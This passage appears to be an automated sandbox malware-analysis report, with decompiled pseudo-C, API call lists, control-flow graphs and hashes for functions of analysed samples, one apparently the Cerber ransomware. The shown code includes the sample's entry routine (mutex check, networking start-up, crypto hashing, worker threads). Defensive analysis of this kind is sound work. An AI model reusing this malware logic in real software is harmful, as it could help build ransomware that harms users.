                                                                                                                                                                                        				if (_t41 != 8) goto 0xcef28534;
                                                                                                                                                                                        				 *_t122();
                                                                                                                                                                                        				goto 0xcef28539;
                                                                                                                                                                                        				_t40 =  *_t122();
                                                                                                                                                                                        				if (_t41 == 8) goto 0xcef2854b;
                                                                                                                                                                                        				if (_t41 == 0xb) goto 0xcef2854b;
                                                                                                                                                                                        				if (_t41 != 4) goto 0xcef28463;
                                                                                                                                                                                        				 *(_t110 + 0xa8) = _t124;
                                                                                                                                                                                        				if (_t41 != 8) goto 0xcef28463;
                                                                                                                                                                                        				 *((intOrPtr*)(_t110 + 0xb0)) = r14d;
                                                                                                                                                                                        				goto 0xcef28463;
                                                                                                                                                                                        				return _t40;
                                                                                                                                                                                        			}




















                                                                                                                                                                                        0x7ff7cef28478
                                                                                                                                                                                        0x7ff7cef2847b
                                                                                                                                                                                        0x7ff7cef2847f
                                                                                                                                                                                        0x7ff7cef28488
                                                                                                                                                                                        0x7ff7cef2848d
                                                                                                                                                                                        0x7ff7cef28492
                                                                                                                                                                                        0x7ff7cef28499
                                                                                                                                                                                        0x7ff7cef2849b
                                                                                                                                                                                        0x7ff7cef284a2
                                                                                                                                                                                        0x7ff7cef284a7
                                                                                                                                                                                        0x7ff7cef284b2
                                                                                                                                                                                        0x7ff7cef284b4
                                                                                                                                                                                        0x7ff7cef284bb
                                                                                                                                                                                        0x7ff7cef284c5
                                                                                                                                                                                        0x7ff7cef284c7
                                                                                                                                                                                        0x7ff7cef284cf
                                                                                                                                                                                        0x7ff7cef284d1
                                                                                                                                                                                        0x7ff7cef284d7
                                                                                                                                                                                        0x7ff7cef284d9
                                                                                                                                                                                        0x7ff7cef284dd
                                                                                                                                                                                        0x7ff7cef284e7
                                                                                                                                                                                        0x7ff7cef284ef
                                                                                                                                                                                        0x7ff7cef284f6
                                                                                                                                                                                        0x7ff7cef284fe
                                                                                                                                                                                        0x7ff7cef28508
                                                                                                                                                                                        0x7ff7cef2850a
                                                                                                                                                                                        0x7ff7cef2850f
                                                                                                                                                                                        0x7ff7cef28515
                                                                                                                                                                                        0x7ff7cef28519
                                                                                                                                                                                        0x7ff7cef28525
                                                                                                                                                                                        0x7ff7cef2852f
                                                                                                                                                                                        0x7ff7cef28532
                                                                                                                                                                                        0x7ff7cef28536
                                                                                                                                                                                        0x7ff7cef2853b
                                                                                                                                                                                        0x7ff7cef28540
                                                                                                                                                                                        0x7ff7cef28545
                                                                                                                                                                                        0x7ff7cef2854b
                                                                                                                                                                                        0x7ff7cef28554
                                                                                                                                                                                        0x7ff7cef2855a
                                                                                                                                                                                        0x7ff7cef28561
                                                                                                                                                                                        0x7ff7cef2857d

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 27599310-0
                                                                                                                                                                                        • Opcode ID: adf8396a3541b27ccf66cf7ef570de70f0f465a497b8ff800b747b885a353d70
                                                                                                                                                                                        • Instruction ID: 59cdfaaa10d1aafec1bab6e228c1a60305cccebf25285475b4057946ee8abf45
                                                                                                                                                                                        • Opcode Fuzzy Hash: adf8396a3541b27ccf66cf7ef570de70f0f465a497b8ff800b747b885a353d70
                                                                                                                                                                                        • Instruction Fuzzy Hash: D1518332E0C68A87FAE5EF14A44123AE691EF84774FD48435D95E63694CF3CF845C621
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                                        			E00007FF77FF7CEF26FF4(signed int __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                        				int _t46;
                                                                                                                                                                                        				signed long long _t56;
                                                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				signed long long _t81;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                        				int _t93;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t83 = _t82 - 0x40;
                                                                                                                                                                                        				_t81 = _t83 + 0x30;
                                                                                                                                                                                        				 *((long long*)(_t81 + 0x40)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t81 + 0x48)) = __rsi;
                                                                                                                                                                                        				 *((long long*)(_t81 + 0x50)) = __rdi;
                                                                                                                                                                                        				_t56 =  *0xcef2eb60; // 0xd44e0b4a63bf
                                                                                                                                                                                        				 *_t81 = _t56 ^ _t81;
                                                                                                                                                                                        				r13d = r9d;
                                                                                                                                                                                        				r15d = __edx;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t81 + 0x68)) != 0) goto 0xcef27039;
                                                                                                                                                                                        				 *(_t81 + 0x70) =  ~( *(_t81 + 0x70));
                                                                                                                                                                                        				 *((intOrPtr*)(_t83 + 0x28)) = 0;
                                                                                                                                                                                        				asm("sbb edx, edx");
                                                                                                                                                                                        				 *((long long*)(_t83 + 0x20)) = __rdi;
                                                                                                                                                                                        				_t23 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                                                                                                                        				_t93 = _t23;
                                                                                                                                                                                        				_t46 = _t23;
                                                                                                                                                                                        				if (_t46 != 0) goto 0xcef27062;
                                                                                                                                                                                        				goto 0xcef2712c;
                                                                                                                                                                                        				if (_t46 <= 0) goto 0xcef270cb;
                                                                                                                                                                                        				if (_t93 - 0xfffffff0 > 0) goto 0xcef270cb;
                                                                                                                                                                                        				_t70 = _t93 + _t93 + 0x10;
                                                                                                                                                                                        				if (_t70 - 0x400 > 0) goto 0xcef270b2;
                                                                                                                                                                                        				if (_t70 + 0xf - _t70 > 0) goto 0xcef27094;
                                                                                                                                                                                        				E00007FF77FF7CEF28DA0(0, 0xffffffffffffff0, _t91, _t92);
                                                                                                                                                                                        				_t84 = _t83 - 0xfffffff0;
                                                                                                                                                                                        				_t64 = _t84 + 0x30;
                                                                                                                                                                                        				if (_t64 == 0) goto 0xcef2705b;
                                                                                                                                                                                        				 *_t64 = 0xcccc;
                                                                                                                                                                                        				goto 0xcef270c5;
                                                                                                                                                                                        				_t26 = malloc(??);
                                                                                                                                                                                        				if (0xfffffff0 == 0) goto 0xcef270ce;
                                                                                                                                                                                        				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
                                                                                                                                                                                        				goto 0xcef270ce;
                                                                                                                                                                                        				_t67 = __rdi;
                                                                                                                                                                                        				if (__rdi == 0) goto 0xcef2705b;
                                                                                                                                                                                        				E00007FF77FF7CEF26B20(_t26,  *((intOrPtr*)( *__rcx + 4)), 0, __rdi, __rdx, _t93 + _t93);
                                                                                                                                                                                        				r9d = r13d;
                                                                                                                                                                                        				 *((intOrPtr*)(_t84 + 0x28)) = r12d;
                                                                                                                                                                                        				 *((long long*)(_t84 + 0x20)) = __rdi;
                                                                                                                                                                                        				_t28 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                                                                                                                        				if (_t28 == 0) goto 0xcef27119;
                                                                                                                                                                                        				r8d = _t28;
                                                                                                                                                                                        				GetStringTypeW(??, ??, ??, ??);
                                                                                                                                                                                        				_t18 = _t67 - 0x10; // -16
                                                                                                                                                                                        				if ( *_t18 != 0xdddd) goto 0xcef2712a;
                                                                                                                                                                                        				E00007FF77FF7CEF27460(0xffffffffffffff0, _t18);
                                                                                                                                                                                        				return E00007FF77FF7CEF271F0(r15d, __rdi,  *_t81 ^ _t81, __rdi, __rsi);
                                                                                                                                                                                        			}

















                                                                                                                                                                                        0x7ff7cef27098
                                                                                                                                                                                        0x7ff7cef2709d
                                                                                                                                                                                        0x7ff7cef270a0
                                                                                                                                                                                        0x7ff7cef270a8
                                                                                                                                                                                        0x7ff7cef270aa
                                                                                                                                                                                        0x7ff7cef270b0
                                                                                                                                                                                        0x7ff7cef270b2
                                                                                                                                                                                        0x7ff7cef270bd
                                                                                                                                                                                        0x7ff7cef270bf
                                                                                                                                                                                        0x7ff7cef270c9
                                                                                                                                                                                        0x7ff7cef270cb
                                                                                                                                                                                        0x7ff7cef270d1
                                                                                                                                                                                        0x7ff7cef270de
                                                                                                                                                                                        0x7ff7cef270e3
                                                                                                                                                                                        0x7ff7cef270f0
                                                                                                                                                                                        0x7ff7cef270f5
                                                                                                                                                                                        0x7ff7cef270fa
                                                                                                                                                                                        0x7ff7cef27102
                                                                                                                                                                                        0x7ff7cef27108
                                                                                                                                                                                        0x7ff7cef27111
                                                                                                                                                                                        0x7ff7cef27119
                                                                                                                                                                                        0x7ff7cef27123
                                                                                                                                                                                        0x7ff7cef27125
                                                                                                                                                                                        0x7ff7cef27151

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharMultiWide$StringTypemalloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4066956681-0
                                                                                                                                                                                        • Opcode ID: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                                                                                                                                        • Instruction ID: c7db00c28cfba8058d9d45403975994c2224984fbbc01b4b5642ecb012a81edb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 32417922A05B8186EB90EF25D800569A3D5FF84BB8F984635EE2D5B7D5DF3DE4058310
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E00007FF77FF7CEF2509C(void* __rax) {
                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = __rax;
                                                                                                                                                                                        				E00007FF77FF7CEF25284(_t12, _t17, __rax);
                                                                                                                                                                                        				if (( *0xcef2e540 &  *(_t21 + 0xc8)) == 0) goto 0xcef250d0;
                                                                                                                                                                                        				if ( *((long long*)(_t21 + 0xc0)) == 0) goto 0xcef250d0;
                                                                                                                                                                                        				E00007FF77FF7CEF25284( *(_t21 + 0xc8),  *((long long*)(_t21 + 0xc0)), _t21);
                                                                                                                                                                                        				_t24 =  *((intOrPtr*)(_t21 + 0xc0));
                                                                                                                                                                                        				goto 0xcef250fb;
                                                                                                                                                                                        				E00007FF77FF7CEF2741C();
                                                                                                                                                                                        				_t6 = _t24 + 0xc0; // 0xc0
                                                                                                                                                                                        				_t27 =  *0xcef2e970; // 0x7ff7cef2e810
                                                                                                                                                                                        				E00007FF77FF7CEF25044(_t21, _t6, _t27, _t28, _t29, _t30);
                                                                                                                                                                                        				_t25 = _t21;
                                                                                                                                                                                        				E00007FF77FF7CEF2731C();
                                                                                                                                                                                        				if (_t25 != 0) goto 0xcef25108;
                                                                                                                                                                                        				_t7 = _t25 + 0x20; // 0x20
                                                                                                                                                                                        				return E00007FF77FF7CEF25BAC(_t7, _t25, _t30);
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _amsg_exit_getptd$_lock
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3670291111-0
                                                                                                                                                                                        • Opcode ID: 01117153be94f76d20bd6ef527d8a73ab58fc85a1a2034cd2b91cda1fd46b9a7
                                                                                                                                                                                        • Instruction ID: a6cfe694941e875e72ff196dfa1425f8182a23f238f35bb7f5e426f42fbb94c9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 01117153be94f76d20bd6ef527d8a73ab58fc85a1a2034cd2b91cda1fd46b9a7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 67F01211A0A14286FAD6BFA18C517B89251EF84764F984135DA0D6F3D2EF1CA844D372
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AD62: CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1643522540-0
                                                                                                                                                                                        • Opcode ID: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
                                                                                                                                                                                        • Instruction ID: e707437ec58a6c757e266905c9f68223cccbec67ed6f77b66ad84f0330a91ceb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 41014671600308BFEF218FA1DD8AA9E7B7EEF04341F008035B901A19A0D7718E64AA24
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 190 40ad62-40ad6a 191 40ad80-40ad85 190->191 192 40ad6c-40ad7a CryptAcquireContextW 190->192 192->191
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AcquireContextCrypt
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3951991833-0
                                                                                                                                                                                        • Opcode ID: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
                                                                                                                                                                                        • Instruction ID: 71168021d763e1e7dcbc7070406abf6f585069e42b9707890cf07a7ddbdd7918
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BC04C70750252AEEF309720AD46F353779A724F01FF04631F90AEA990D2F6688D8A5D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                        			_entry_() {
                                                                                                                                                                                        				char _v404;
                                                                                                                                                                                        				short _v684;
                                                                                                                                                                                        				void _v890;
                                                                                                                                                                                        				char _v892;
                                                                                                                                                                                        				intOrPtr _v912;
                                                                                                                                                                                        				char* _v916;
                                                                                                                                                                                        				intOrPtr _v928;
                                                                                                                                                                                        				intOrPtr _v948;
                                                                                                                                                                                        				char* _v952;
                                                                                                                                                                                        				void _v976;
                                                                                                                                                                                        				struct tagOFNA _v980;
                                                                                                                                                                                        				char _v984;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(_t61);
                                                                                                                                                                                        				_v984 = 0;
                                                                                                                                                                                        				memset( &_v976, 0, 0x54);
                                                                                                                                                                                        				_v892 = 0;
                                                                                                                                                                                        				_v980 = 0x58;
                                                                                                                                                                                        				memset( &_v890, 0, 0xc8);
                                                                                                                                                                                        				_v952 =  &_v892;
                                                                                                                                                                                        				_v916 =  &_v984;
                                                                                                                                                                                        				_v948 = 0x64;
                                                                                                                                                                                        				_v928 = 0x20;
                                                                                                                                                                                        				_v912 = E004066BB;
                                                                                                                                                                                        				GetOpenFileNameW( &_v980); // executed
                                                                                                                                                                                        				if(_v984 != 0) {
                                                                                                                                                                                        					SetErrorMode(0x8007); // executed
                                                                                                                                                                                        					E00402EFB(_t53, _t54, _t61, 0,  &_v684);
                                                                                                                                                                                        					CreateMutexW(0, 0,  &_v684); // executed
                                                                                                                                                                                        					_t32 = GetLastError();
                                                                                                                                                                                        					__eflags = _t32 - 0xb7;
                                                                                                                                                                                        					if(_t32 == 0xb7) {
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						ExitProcess( *0x40fc78);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x42f838 = GetModuleHandleA(0);
                                                                                                                                                                                        					GetModuleFileNameW(0, 0x42f840, 0x104);
                                                                                                                                                                                        					_t62 = E00401270();
                                                                                                                                                                                        					__eflags = _t62;
                                                                                                                                                                                        					if(_t62 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00406C8C(_t62);
                                                                                                                                                                                        					_pop(_t56);
                                                                                                                                                                                        					_t38 = E004027DD(_t56, _t60, __eflags, _t62);
                                                                                                                                                                                        					_pop(_t57);
                                                                                                                                                                                        					__eflags = _t38;
                                                                                                                                                                                        					if(_t38 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t39 = E00406005(_t57);
                                                                                                                                                                                        					 *0x42fa54 = _t39;
                                                                                                                                                                                        					 *0x42fa58 = _t39;
                                                                                                                                                                                        					__eflags = _t39 - 0x3000;
                                                                                                                                                                                        					if(__eflags >= 0) {
                                                                                                                                                                                        						E0040186A(_t53, _t57, _t60, _t62, __eflags, _t62);
                                                                                                                                                                                        						_pop(_t57);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x40e00c(0x202,  &_v404);
                                                                                                                                                                                        					 *0x42f834 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                                        					_t66 = CreateThread(0, 0, 0x406488, 0, 0, 0);
                                                                                                                                                                                        					E00406598(_t62, _t57, _t60, _t66, __eflags);
                                                                                                                                                                                        					WaitForSingleObject(_t66, 0xffffffff);
                                                                                                                                                                                        					CloseHandle(_t66);
                                                                                                                                                                                        					CloseHandle( *0x42f834);
                                                                                                                                                                                        					E004082AB(_t53, _t57, _t60, _t62, __eflags, _t62);
                                                                                                                                                                                        					E00403085(__eflags, _t62);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}




























                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00406875
                                                                                                                                                                                        0x00406776

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.NTDLL ref: 0040670C
                                                                                                                                                                                        • memset.NTDLL ref: 0040672E
                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00406763
                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008007), ref: 0040677C
                                                                                                                                                                                        • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040679A
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004067A0
                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 004067B2
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,0042F840,00000104), ref: 004067C8
                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0040681D
                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406828
                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00406488,00000000,00000000,00000000), ref: 0040683D
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040684F
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00406856
                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00406862
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040687E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateHandle$CloseErrorFileModuleNamememset$EventExitLastModeMutexObjectOpenProcessSingleStartupThreadWait
                                                                                                                                                                                        • String ID: $X$d
                                                                                                                                                                                        • API String ID: 489344662-4046183327
                                                                                                                                                                                        • Opcode ID: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
                                                                                                                                                                                        • Instruction ID: 660d1c7cf976cc34eab42097ed30c14822809f0425eed3060e2e2b5ec831864e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6541AC32005310AFD320AB61ED4DE9F7BA8EF86765F00453EF045E61E0DB788549CBAA
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 27 40533b-40534f GetLastError call 40521d 30 405351 call 4052db 27->30 31 405356-40535b 27->31 30->31 33 40535d-40537f call 4051f5 RtlAllocateHeap 31->33 34 4053af-4053b3 31->34 37 405381-40538e call 405329 33->37 38 4053ae 33->38 41 405390-40539e memset 37->41 42 4053a1-4053a3 37->42 38->34 41->42 42->38 43 4053a5-4053a8 SetLastError 42->43 43->38
                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E0040533B(void* __ecx, void* __edi, long _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                        				_t24 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_v8 = GetLastError();
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					E004052DB(_t24); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                                        					_t2 = _t27 + 2; // 0x16
                                                                                                                                                                                        					_t29 = E004051F5(_t24, _t2);
                                                                                                                                                                                        					_t3 = _t29 + 0xc; // 0xc
                                                                                                                                                                                        					if(RtlAllocateHeap( *0x42f808, _a4, _t3) != 0) {
                                                                                                                                                                                        						_t22 = E00405329(_t16, _t29);
                                                                                                                                                                                        						if((_a4 & 0x00000008) == 0) {
                                                                                                                                                                                        							memset(_t22 + _t27, 0, _t29 - _t27);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t22 != 0) {
                                                                                                                                                                                        							SetLastError(_v8);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10), ref: 0040533F
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0000000C,?), ref: 00405377
                                                                                                                                                                                        • memset.NTDLL ref: 00405399
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 004053A8
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
